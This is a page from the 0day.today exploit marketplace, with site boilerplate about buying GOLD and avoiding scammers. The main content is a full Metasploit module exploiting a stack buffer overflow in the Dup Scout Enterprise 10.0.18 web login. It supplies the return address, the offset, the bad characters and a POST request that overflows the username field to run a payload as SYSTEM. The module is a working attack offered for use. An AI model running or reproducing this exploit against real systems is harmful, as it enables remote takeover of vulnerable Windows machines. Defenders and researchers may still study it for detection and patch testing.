0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dup Scout Enterprise 10.0.18 Buffer Overflow Exploit
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Dup Scout Enterprise Login Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Dup Scout Enterprise 10.0.18. The buffer overflow exists via the web interface during login. This gives NT AUTHORITY\SYSTEM access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Higgins', # msf Module -- @ch1gg1ns 'sickness' # Original discovery ], 'References' => [ [ 'EDB', '43145' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d" }, 'Targets' => [ [ 'Dup Scout Enterprise 10.0.18', { 'Ret' => 0x10090c83, # jmp esp - libspp.dll 'Offset' => 780 } ], ], 'Privileged' => true, 'DisclosureDate' => 'Nov 14 2017', 'DefaultTarget' => 0)) register_options([Opt::RPORT(80)]) end def check res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit connect print_status("Generating exploit...") evil = rand_text(target['Offset']) evil << [target.ret].pack('V') evil << make_nops(12) evil << payload.encoded evil << make_nops(10000 - evil.length) vprint_status("Evil length: " + evil.length.to_s) sploit = "username=" sploit << evil sploit << "&password=" sploit << rand_text(evil.length) sploit << "\r\n" print_status("Triggering the exploit now...") res = send_request_cgi({ 'uri' => '/login', 'method' => 'POST', 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '17000', 'data' => sploit }) handler disconnect end end # 0day.today [2024-11-15] #